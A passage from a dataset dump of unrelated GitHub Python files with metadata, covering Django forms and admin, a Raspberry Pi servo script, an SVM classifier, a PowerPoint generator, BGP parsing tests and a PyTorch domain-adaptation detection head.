function\nprint(insertion_sort())","repo_name":"adriansgrrx/5-Sorting-Algorithms","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37670500018","text":"from django.core.exceptions import ValidationError\nfrom django.db.models import fields\nfrom django import forms\n\nfrom crispy_forms.helper import FormHelper\n\nfrom collection.models.chief_minister_form_collection import ChiefMinisterOfficeFormCollection\nfrom master_data import models\n\nclass ChiefMinisterOfficeFormCollectionForm(forms.ModelForm):\n \n class Meta:\n model = ChiefMinisterOfficeFormCollection\n fields = ('province', 'fiscal_year')\n exclude = ('user', )\n widgets = {\n 'province': forms.Select(attrs={'autocomplete': 'off'}),\n }\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'create_form'\n \n def save(self, commit=True):\n \"\"\"\n Create respective Chief Ministers Office Body, if it does not exist\n \"\"\"\n instance = super().save(commit=False)\n try:\n ia_name = 'मुख्यमन्त्री तथा मन्त्रीपरिषदको कार्यालय, ' + instance.province.name\n body = models.GovernmentBody.objects.get(name=ia_name)\n except models.GovernmentBody.DoesNotExist:\n body = models.GovernmentBody.objects.create(\n name=ia_name,\n type=models.GovernmentBodyType.objects.get(name='मुख्यमन्त्री तथा मन्त्रीपरिषदको कार्यालय'),\n province=instance.province,\n ) \n \n instance.body = body\n instance.save()\n return instance","repo_name":"Rabin5/formcollection","sub_path":"collection/forms/chief_minister_forms.py","file_name":"chief_minister_forms.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33592096873","text":"#!/usr/bin/env python \r\nimport sys, time\r\nimport RPi.GPIO as GPIO\r\nGPIO.setmode(GPIO.BOARD)\r\nservo1 = 16 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nservo2 = 17 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nservo3 = 18 # GPIO @ connected on 16 pin / Ref RasPi4B.\r\nGPIO.setup(servo1, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\nGPIO.setup(servo2, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\nGPIO.setup(servo3, GPIO.OUT, initial=GPIO.LOW) #Set GPIO \r\n\r\norder = ' '.join(sys.argv[1:])\r\n\r\nclass Control_servo:\r\n def Servo(self, order):\r\n self.order = order\r\n print (f\"Servo {self.order} ON!\") \r\n if (self.order == '1'):\r\n GPIO.output(16, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(16, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\n elif (self.order == '2'):\r\n GPIO.output(17, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(17, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\n elif (self.order == '3'):\r\n GPIO.output(18, GPIO.HIGH) # Turn on\r\n sleep(1) # Sleep for 1 second\r\n GPIO.output(18, GPIO.LOW) # Turn off\r\n sleep(1) # Sleep for 1 second\r\n \r\ns = Control_servo()\r\ns.Servo(order)","repo_name":"mo0303/Update_Project","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38912510853","text":"import numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import SVC\nfrom sklearn import metrics\nfrom sklearn.externals import joblib\ndef create_SVM_Model(data):\n\n (train_texts, train_labels), (test_texts, test_labels) = data \n # Support Vectormachine\n svm_pip = Pipeline([ \n ('tfidf_vector_com', TfidfVectorizer(\n input='array', encoding=\"ISO-8859-1\",\n max_df=0.8,\n min_df=1,\n norm='l2',\n max_features=None, \n lowercase = True,\n sublinear_tf = True,\n stop_words='english',\n )),\n\n ('clf', SVC(C=10 , \n cache_size=10000, \n kernel='rbf', \n gamma = 0.1,\n probability =True, \n class_weight=None,\n tol=0.001))\n ])\n #SVM\n print(\"\\n --- TEST OUTPUT SVM ---\")\n svm_pip.fit(train_texts,train_labels)\n print(\"\\n --- SVM Training Done---\")\n predicted_SWR = svm_pip.predict(test_texts)\n predicted_SWR_train = svm_pip.predict(train_texts)\n print(\"\\n --- SVM Predicting Done---\")\n joblib.dump(svm_pip, 'SVMClassifier.sav', protocol=2)\n #Metrics\n print(\"Accuracy SVM test data: \" + str(np.mean(predicted_SWR == test_labels))) \n print(\"Accuracy SVM train data: \" + str(np.mean(predicted_SWR_train == train_labels)))\n\n\n","repo_name":"Zwitterion01/525Final","sub_path":"createSVM.py","file_name":"createSVM.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14468160570","text":"import os\nfrom pptx import Presentation\nfrom pptx.util import Inches, Cm, Pt\nimport os\n# ベースフォルダのパスを入力させる\nbase_folder = input(\"ベースフォルダのパスを入力してください: \")\n# ベースフォルダ内のサブフォルダを取得\nimage_folders = [f1 for f1 in os.listdir(base_folder) if os.path.isdir(os.path.join(base_folder, f1))]\ntemplate_file = 'test_template.pptx'\noutput_file = 'output.pptx'\n# パワーポイントプレゼンテーションを作成\npresentation = Presentation(template_file)\n# 画像フォルダ内の画像ファイルを取得\nfor image_folder in image_folders:\n image_files = [f for f in os.listdir(os.path.join(base_folder, image_folder)) if f.endswith(('.jpg', '.jpeg', '.png', '.gif'))]\n slide_layout = presentation.slide_layouts[6] # レイアウト6を使用するスライドレイアウト\n slide = presentation.slides.add_slide(slide_layout)\n # スライド上に画像を配置する位置とサイズの設定\n left = Cm(1) # 左端の位置(センチメートル単位)\n top = Cm(2) # 上端の位置(センチメートル単位)\n width = Cm(5) # 画像の幅(センチメートル単位)\n height = Cm(4) # 画像の高さ(センチメートル単位)\n space = Cm(1) # 画像間のスペース(センチメートル単位\n # フォルダ名を記載するテキストボックスを作成\n folder_name_textbox_left = Cm(12)\n folder_name_textbox_top = Cm(6)\n folder_name_textbox_width = Cm(8)\n folder_name_textbox_height = Cm(1)\n folder_name_textbox = slide.shapes.add_textbox(folder_name_textbox_left, folder_name_textbox_top, folder_name_textbox_width, folder_name_textbox_height)\n folder_name_text_frame = folder_name_textbox.text_frame\n folder_name_text_frame.word_wrap = False\n folder_name_text = folder_name_text_frame.add_paragraph().add_run()\n folder_name_text.text = image_folder\n folder_name_text.font.size = Pt(28)\n # README.mdのテキストを読み込む\n image_folder=os.path.join(base_folder, image_folder)\n readme_file = os.path.join(image_folder, 'README.md')\n if os.path.isfile(readme_file):\n with open(readme_file, 'r', encoding='utf-8') as f:\n readme_text = f.read()\n else:\n readme_text = \"\"\n # 画像をスライドに配置する\n for i, image_file in enumerate(image_files):\n if i % 9 == 0:\n slide_layout = presentation.slide_layouts[6] # レイアウト6を使用するスライドレイアウト\n slide = presentation.slides.add_slide(slide_layout)\n left = Cm(1) # 左端の位置(センチメートル単位)\n top = Cm(2) # 上端の位置(センチメートル単位)\n width = Cm(5) # 画像の幅(センチメートル単位)\n height = Cm(4) # 画像の高さ(センチメートル単位)\n space = Cm(1) # 画像間のスペース(センチメートル単位\n folder_name_textbox_left = Cm(1)\n folder_name_textbox_top = Cm(0.1)\n folder_name_textbox_width = Cm(8)\n folder_name_textbox_height = Cm(1)\n folder_name_textbox = slide.shapes.add_textbox(folder_name_textbox_left, folder_name_textbox_top, folder_name_textbox_width, folder_name_textbox_height)\n folder_name_text_frame = folder_name_textbox.text_frame\n folder_name_text_frame.word_wrap = False\n folder_name_text = folder_name_text_frame.add_paragraph().add_run()\n folder_name_text.text = image_folder\n folder_name_text.font.size = Pt(18)\n # テキストボックスを作成してテキストを貼り付ける\n textbox_left = Cm(19) # 左端の位置(センチメートル単位)\n textbox_top = Cm(1) # 上端の位置(センチメートル単位)\n textbox_width = presentation.slide_width - textbox_left - Cm(1) # テキストボックスの幅\n textbox_height = presentation.slide_height - textbox_top - Cm(1) # テキストボックスの高さ\n textbox = slide.shapes.add_textbox(textbox_left, textbox_top, textbox_width, textbox_height)\n # textbox = presentation.shapes.add_textbox(textbox_left, textbox_top, textbox_width, textbox_height)\n textbox.text = readme_text\n text_frame = textbox.text_frame\n text_frame.word_wrap = True\n # テキストボックスのテキストを設定\n p = text_frame.add_paragraph()\n p.text = readme_text\n # テキストの書式設定\n p.font.size = Pt(12) # フォントサイズを14ポイントに設定\n p.font.name = \"Meiryo\" # フォント名をMeiryoに設定\n image_path = os.path.join(image_folder, image_file)\n image_path= os.path.join(base_folder, image_path)\n image = slide.shapes.add_picture(image_path, left, top, width, height)\n left += width + space # 次の画像の左端位置を更新\n k=(i+1) % 3\n if k == 0:\n left=Cm(1)\n top += height + space # 次の行の上端位置を更新\npresentation.save(output_file)\nos.startfile(output_file)","repo_name":"ojirou/py2307_imgs_text2ppt","sub_path":"imgs_text2ppt.py","file_name":"imgs_text2ppt.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22878765685","text":"import datetime\nfrom datetime import datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ntransform = 'Field Mill'\n\ndef time_date(row):\n row['datetime'] = f\"{row['Event Date']} {row['Event Time']}\"\n row['datetime'] = pd.to_datetime(row['datetime'])\n return row\n\ndef field_mill(path, launchtime):\n try:\n # load\n df = pd.read_csv(path)\n\n # merge date and time\n df = df.apply(time_date, axis=1) \n \n # remove excess columns\n df.drop(columns=['Event Date', 'Event Time', 'Mill Number'], inplace=True)\n\n groupby = df.groupby(by='datetime').mean()\n\n groupby.rename(columns={'One Minute Mean':'Field Mill Mean'}, inplace=True)\n \n\n # create empty dataframe in 5 minute time increments in the time zero\n l = (pd.DataFrame(columns=['NULL'],index=pd.date_range(launchtime - datetime.timedelta(hours=4), launchtime,freq='5T')))\n\n # merge_asof groups nearby indices with a tolerance of 5 minutes\n groupby = pd.merge_asof(l, groupby, left_index=True, right_index=True, tolerance=pd.Timedelta(\"5m\"))\n \n # created NULL column\n groupby.drop(columns='NULL', inplace=True)\n groupby = groupby.fillna(groupby['Field Mill Mean'].mean())\n logging.debug(f'Successfully transformed data for {transform} at {launchtime} from {path}')\n \n except:\n logging.warning(f'Generating empty dataframe for {transform} at {launchtime} from {path}')\n groupby=pd.DataFrame(columns=['Field Mill Mean'], index=pd.date_range(launchtime - datetime.timedelta(hours=4), launchtime,freq='5T'))\n\n \n return groupby\n ","repo_name":"miscpeeps/bravo-wx-launch","sub_path":"field_mill_transform.py","file_name":"field_mill_transform.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"6175711196","text":"fname = 'input.txt'\n\nwith open(fname) as f:\n content = f.readlines()\ncontent = [x.strip() for x in content]\n\nused_coordinates = {}\nfor word in content:\n splits = word.split(\" \")\n coordinates = splits[2][:-1].split(\",\")\n lengths = splits[3].split(\"x\")\n\n # (0,0) is upper left coordinate\n x0 = int(coordinates[0]) + 1\n y0 = int(coordinates[1]) + 1\n\n lengthX = int(lengths[0])\n lengthY = int(lengths[1])\n\n for i in range (0,lengthX):\n for j in range (0, lengthY):\n x = x0 + i\n y = y0 + j\n if (x, y) not in used_coordinates:\n used_coordinates[(x, y)] = 1\n else:\n used_coordinates[(x, y)] += 1\n\ntotal_overlapping_inches = 0\nfor key, value in used_coordinates.items():\n if used_coordinates[key] > 1:\n total_overlapping_inches += 1\n\nprint(\"Total overlapping inches: \" + str(total_overlapping_inches))","repo_name":"martinmatak/AoC18","sub_path":"day3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39358440234","text":"import unittest\n\nfrom yabgp.common import exception as excep\nfrom yabgp.common.constants import ERR_MSG_UPDATE_ATTR_LEN\nfrom yabgp.message.attribute.aggregator import Aggregator\n\n\nclass TestAggregator(unittest.TestCase):\n def test_parse(self):\n\n # 4 bytes asn\n aggregator = Aggregator.parse(value=b'\\x00\\x00\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=True)\n self.assertEqual((28885, '62.231.255.121'), aggregator)\n\n # 2 bytes asn\n aggregator = Aggregator.parse(value=b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=False)\n self.assertEqual((28885, '62.231.255.121'), aggregator)\n\n # invalid attr len\n self.assertRaises(excep.UpdateMessageError, Aggregator.parse,\n b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n True)\n try:\n Aggregator.parse(value=b'\\x70\\xd5\\x3e\\xe7\\xff\\x79',\n asn4=True)\n except excep.UpdateMessageError as e:\n self.assertEqual(ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)\n\n def test_construct(self):\n\n aggregator = Aggregator.construct(value=(28885, '62.231.255.121'))\n self.assertEqual(b'\\xc0\\x07\\x06\\x70\\xd5\\x3e\\xe7\\xff\\x79', aggregator)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"smartbgp/yabgp","sub_path":"yabgp/tests/unit/message/attribute/test_aggregator.py","file_name":"test_aggregator.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"45"} +{"seq_id":"36903820550","text":"import requests\nimport re\nimport ctypes\nimport os\n\ndef getPic():\n root_url = 'https://cn.bing.com'\n pic_url = ''\n #获取壁纸的下载地址\n try:\n r = requests.get(root_url)\n pic_url = root_url+re.findall(r'num_line-n:\n print(y,end=\"\")\n y=x.readline()\n\nx.close()","repo_name":"Deep455/Python-programs-ITW1","sub_path":"python_assignment_3/py4.py","file_name":"py4.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23286316942","text":"from django.contrib import admin\nfrom django.contrib.auth.models import Permission\nfrom django import forms\nfrom django.db.models import Count\nfrom django.template.response import TemplateResponse\nfrom django.urls import path\nfrom django.utils.html import mark_safe\nfrom .models import Category, Course, Lesson, Tag, User\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\n\n\nclass LessonForm(forms.ModelForm):\n content = forms.CharField(widget=CKEditorUploadingWidget)\n\n class Meta:\n model = Lesson\n fields = '__all__'\n\n\nclass LessonTagInline(admin.TabularInline):\n model = Lesson.tags.through\n\n\nclass LessonAdmin(admin.ModelAdmin):\n class Media:\n css = {\n 'all': ('/static/css/main.css',)\n }\n\n form = LessonForm\n list_display = [\"id\", \"subject\", \"created_date\", \"course\"]\n search_fields = [\"subject\", \"created_date\", \"course__subject\"]\n list_filter = [\"subject\", \"course__subject\"]\n readonly_fields = [\"avatar\"]\n inlines = (LessonTagInline, )\n\n def avatar(self, lesson):\n return mark_safe(\"{alt}\".format(img_url=lesson.image.name, alt=lesson.subject))\n\n\n#Many to one\nclass LessonInline(admin.StackedInline): #StackedInline: tạo các form nằm chồng lên nhau\n model = Lesson #InlineModelAdmin: dạng inline chuẩn\n pk_name = 'course' #TabularInline: dạng bảng\n\n\nclass CourseAdmin(admin.ModelAdmin):\n inlines = (LessonInline, )\n\n\nclass CourseAppAdminSite(admin.AdminSite):\n site_header = 'HỆ THỐNG QUẢN LÝ KHÓA HỌC'\n\n def get_urls(self):\n return [\n path('course-stats/', self.course_stats)\n ] + super().get_urls()\n\n def course_stats(self, request):\n course_count = Course.objects.count()\n stats = Course.objects.annotate(lesson_count=Count('lessons')).values(\"id\", \"subject\", \"lesson_count\") #lessons: là related_name của biến course trong models\n return TemplateResponse(request, 'admin/course-stats.html', {\n 'course_count': course_count,\n 'stats': stats\n })\n\n\n#admin_site = CourseAppAdminSite('mycourse')\n\n\n# Register your models here. (Nơi cấu hình những thông tin của trang admin)\nadmin.site.register(Category)\nadmin.site.register(Course, CourseAdmin)\nadmin.site.register(Lesson, LessonAdmin)\nadmin.site.register(User)\nadmin.site.register(Permission)\n#admin_site.register(Category)\n#admin_site.register(Course, CourseAdmin)\n#admin_site.register(Lesson, LessonAdmin)","repo_name":"uyennguyen0721/LearnDjango","sub_path":"CourseApp/courseapp/courses/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26016580864","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom .anchor_head_template import AnchorHeadTemplate\n\nclass GradReverse(torch.autograd.Function):\n def __init__(self, lambd):\n self.lambd = lambd\n\n def forward(self, x):\n return x.view_as(x)\n\n def backward(self, grad_output):\n return (grad_output * self.lambd)\n\ndef grad_reverse(x, lambd):\n return GradReverse(lambd)(x)\n\nclass AnchorHeadSingleRangeGuidance(AnchorHeadTemplate):\n def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range,\n predict_boxes_when_training=True, nusc=False, fpn_layers=[], **kwargs):\n super().__init__(\n model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,\n predict_boxes_when_training=predict_boxes_when_training, nusc=nusc, fpn_layers=fpn_layers\n )\n\n self.num_anchors_per_location = sum(self.num_anchors_per_location)\n\n if self.range_guidance:\n if self.range_guidance_dom_only:\n input_channels_dom = input_channels + 2\n else:\n input_channels = input_channels + 2 + 256\n input_channels_dom = input_channels - 256\n else:\n input_channels_dom = input_channels\n\n self.conv_cls = nn.Conv2d(\n input_channels, self.num_anchors_per_location * self.num_class,\n kernel_size=1\n )\n self.conv_box = nn.Conv2d(\n input_channels, self.num_anchors_per_location * self.box_coder.code_size,\n kernel_size=1\n )\n\n self.rangeinv = self.model_cfg.get('RANGE_INV', False)\n self.keep_x = self.model_cfg.get('KEEP_X', False)\n self.keep_y = self.model_cfg.get('KEEP_Y', False)\n self.keep_xy = self.model_cfg.get('KEEP_XY', False)\n self.rm_thresh = self.model_cfg.get('RM_THRESH', 0)\n\n if self.rangeinv:\n self.conv_range = nn.Conv2d(\n input_channels, 1,\n kernel_size=1\n )\n #nn.Sequential(\n\n\n\n if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:\n self.conv_dir_cls = nn.Conv2d(\n input_channels,\n self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,\n kernel_size=1\n )\n else:\n self.conv_dir_cls = None\n\n\n # if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None) is not None:\n\n if self.range_da > 0:\n self.domain_pool = nn.AdaptiveAvgPool2d(1)\n self.domain_classifier_range = nn.ModuleDict()\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range):\n self.domain_classifier_range[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n if self.keep_xy:\n self.domain_classifier_range2 = nn.ModuleDict()\n for n in range(0+self.remove_near_range2, self.range_da-self.remove_far_range2):\n self.domain_classifier_range2[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n elif self.interval_da > 0:\n self.domain_pool = nn.AdaptiveAvgPool2d(1)\n self.domain_classifier_interval = nn.ModuleDict()\n for n in range(self.interval_da):\n self.domain_classifier_interval[str(n)] = nn.Sequential(nn.Linear(input_channels, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n else:\n self.domain_pool = nn.AdaptiveAvgPool2d(1)\n self.domain_classifier = nn.Sequential(nn.Linear(input_channels_dom, 1024),\n nn.ReLU(True), nn.Dropout(),\n nn.Linear(1024, 256), nn.ReLU(True),\n nn.Dropout(), nn.Linear(256, 1))\n\n self.init_weights()\n\n def init_weights(self):\n pi = 0.01\n nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))\n nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)\n\n def forward(self, data_dict):\n t_mode = data_dict['t_mode']\n l = data_dict['l']\n # print(\"t_mode\", t_mode)\n\n if 'pseudo' in t_mode:\n pseudo = True\n else:\n pseudo = False\n\n spatial_features_2d = data_dict['spatial_features_2d']\n\n # print(\"spatial_features_2d\", spatial_features_2d.shape) 126\n # print('range ctx',self.range_guidance)\n\n if t_mode == 'tsne':\n if self.range_da > 0:\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/(2*self.range_da))\n\n start_dim = {}\n mid1_dim = {}\n mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n if self.keep_xy:\n interval_feat2 = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range): # no0,1\n start_dim[n] = mid_dim - range_interval*(n+1) # 2-1=1, 2-2=0\n mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = mid_dim + range_interval*(n+1) # 2+1=3 2+2=4\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], mid1_dim[n])]+[i for i in range(mid2_dim[n], end_dim[n])])\n\n feat1 = spatial_features_2d[:,:,:,interval_idx[n]]\n feat1 = self.domain_pool(feat1).view(feat1.size(0), -1)\n data_dict[f'spatial_features_2d_x_{n}'] = feat1\n\n feat2 = spatial_features_2d[:,:,interval_idx[n],:]\n feat2 = self.domain_pool(feat2).view(feat2.size(0), -1)\n data_dict[f'spatial_features_2d_y_{n}'] = feat2\n\n\n if self.range_guidance and not self.range_guidance_dom_only:\n total_range = spatial_features_2d.shape[-1]\n half_range = int(spatial_features_2d.shape[-1] * 0.5)\n\n # x_range = torch.zeros((total_range, total_range)).cuda()\n # y_range = torch.zeros((total_range, total_range)).cuda()\n # for i in range(-half_range, half_range):\n # for j in range(-half_range, half_range):\n # x_range[i+half_range,j+half_range] = abs(i+0.5)\n # y_range[i+half_range,j+half_range] = abs(j+0.5)\n x_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1, total_range, 1).cuda()\n # print(\"x_range\", x_range)\n y_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(-1).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1,1,total_range).cuda()\n # print('x_range',x_range[0,-1])\n # print('y_range',y_range[0,-1])\n # print(\"spatial_features_2d 0\", spatial_features_2d.shape)\n # x_range = x_range.unsqueeze(0).unsqueeze(0).repeat((spatial_features_2d.shape[0],1,1,1))\n # y_range = y_range.unsqueeze(0).unsqueeze(0).repeat((spatial_features_2d.shape[0],1,1,1))\n # print('x_range',x_range.shape)\n # print('y_range',y_range.shape)\n spatial_features_2d = torch.cat((spatial_features_2d, x_range, y_range), dim=1)\n # print(\"spatial_features_2d\", spatial_features_2d.shape)\n\n # print(\"t_mode\", t_mode)\n if 'dom_img' in t_mode:\n\n if t_mode == 'dom_img_src':\n dom_src = True\n elif t_mode == 'dom_img_tgt':\n dom_src = False\n else:\n dom_src = None\n #\n if self.range_da > 0:\n mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/(2*self.range_da))\n\n start_dim = {}\n mid1_dim = {}\n mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n if self.keep_xy:\n interval_feat2 = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in range(0+self.remove_near_range, self.range_da-self.remove_far_range): # no0,1\n start_dim[n] = mid_dim - range_interval*(n+1) # 2-1=1, 2-2=0\n mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = mid_dim + range_interval*(n+1) # 2+1=3 2+2=4\n\n # print(\"range n\", n)\n # print(\"start_dim[n]\", start_dim[n])\n # print(\"mid1_dim[n]\", mid1_dim[n])\n # print(\"mid2_dim[n]\", mid2_dim[n])\n # print(\"end_dim[n]\", end_dim[n])\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], mid1_dim[n])]+[i for i in range(mid2_dim[n], end_dim[n])])\n\n if self.keep_x:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n # self.forward_ret_dict[f'spatial_features_2d_x_{n}'] = interval_feat[n]\n elif self.keep_y:\n interval_feat[n] = spatial_features_2d[:,:,interval_idx[n],:]\n # self.forward_ret_dict[f'spatial_features_2d_y_{n}'] = interval_feat[n]\n elif self.keep_xy:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n # self.forward_ret_dict[f'spatial_features_2d_x_{n}'] = interval_feat[n]\n\n\n x_pool = self.domain_pool(interval_feat[n]).view(interval_feat[n].size(0), -1)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier_range[str(n)](x_reverse).squeeze(-1)\n dom_head_context = self.domain_classifier_range[str(n)][:-2](x_reverse)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier_range[str(n)][-2:](dom_head_context)#.squeeze(-1)\n\n self.forward_ret_dict[f'dom_img_preds_range{n}'] = dom_img_preds\n\n if self.keep_xy:\n interval_feat2[n] = spatial_features_2d[:,:,interval_idx[n],:]\n self.forward_ret_dict[f'spatial_features_2d_y_{n}'] = interval_feat2[n]\n\n x_pool2 = self.domain_pool(interval_feat2[n]).view(interval_feat2[n].size(0), -1)\n x_reverse2 = grad_reverse(x_pool2, l*-1)\n # dom_img_preds2 = self.domain_classifier_range2[str(n)](x_reverse2).squeeze(-1)\n\n dom_head_context2 = self.domain_classifier_range2[str(n)][:-2](x_reverse2)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context2'] = dom_head_context2\n\n dom_img_preds2 = self.domain_classifier_range2[str(n)][-2:](dom_head_context2)#.squeeze(-1)\n\n self.forward_ret_dict[f'dom_img_preds_range{n}_2'] = dom_img_preds2\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n elif self.interval_da > 0:\n\n # mid_dim = int(spatial_features_2d.shape[-1]/2.)\n range_interval = int(spatial_features_2d.shape[-1]/self.interval_da)\n\n start_dim = {}\n # mid1_dim = {}\n # mid2_dim = {}\n end_dim = {}\n interval_idx = {}\n interval_feat = {}\n\n # for each range 0,1,2,3 (4)\n\n for n in range(self.interval_da): # 0,1\n start_dim[n] = range_interval*n # 2-1=1, 2-2=0\n # mid1_dim[n] = mid_dim - range_interval*n # 2-0=2 2-1=1 #int(spatial_features_2d.shape[-1]/2.)\n # mid2_dim[n] = mid_dim + range_interval*n # 2+0=2 2+1=3\n end_dim[n] = range_interval*(n+1) # 2+1=3 2+2=4\n\n interval_idx[n] = torch.LongTensor([i for i in range(start_dim[n], end_dim[n])])\n\n # print(\"spatial_features_2d\", spatial_features_2d.shape)\n if self.keep_x:\n interval_feat[n] = spatial_features_2d[:,:,:,interval_idx[n]]\n elif self.keep_y:\n interval_feat[n] = spatial_features_2d[:,:,interval_idx[n],:]\n\n\n # print(\"interval_feat[n]\", interval_feat[n].shape)\n x_pool = self.domain_pool(interval_feat[n]).view(interval_feat[n].size(0), -1)\n # print(\"x_pool[n]\", x_pool.shape)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier_interval[str(n)](x_reverse).squeeze(-1)\n\n dom_head_context = self.domain_classifier_interval[str(n)][:-2](x_reverse)#.squeeze(-1)\n if 'dom_img_det' in t_mode:\n data_dict['dom_head_context'] = dom_head_context\n\n dom_img_preds = self.domain_classifier_interval[str(n)][-2:](dom_head_context)#.squeeze(-1)\n\n\n\n self.forward_ret_dict[f'dom_img_preds_interval{n}'] = dom_img_preds\n\n if self.training:\n targets_dict_dom = self.assign_targets(\n gt_boxes=data_dict['gt_boxes'],\n dom_src=dom_src,\n pseudo=pseudo\n )\n self.forward_ret_dict.update(targets_dict_dom)\n\n\n else:\n\n if self.range_guidance and self.range_guidance_dom_only:\n total_range = spatial_features_2d.shape[-1]\n half_range = int(spatial_features_2d.shape[-1] * 0.5)\n x_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1, total_range, 1).cuda()\n y_range = torch.abs(torch.arange(-half_range, half_range, 1).float() + 0.5).unsqueeze(-1).unsqueeze(0).unsqueeze(0).repeat(spatial_features_2d.shape[0],1,1,total_range).cuda()\n spatial_features_2d = torch.cat((spatial_features_2d, x_range, y_range), dim=1)\n\n\n\n x_pool = self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)\n x_reverse = grad_reverse(x_pool, l*-1)\n # dom_img_preds = self.domain_classifier(x_reverse).squeeze(-1)\n\n dom_head_context = 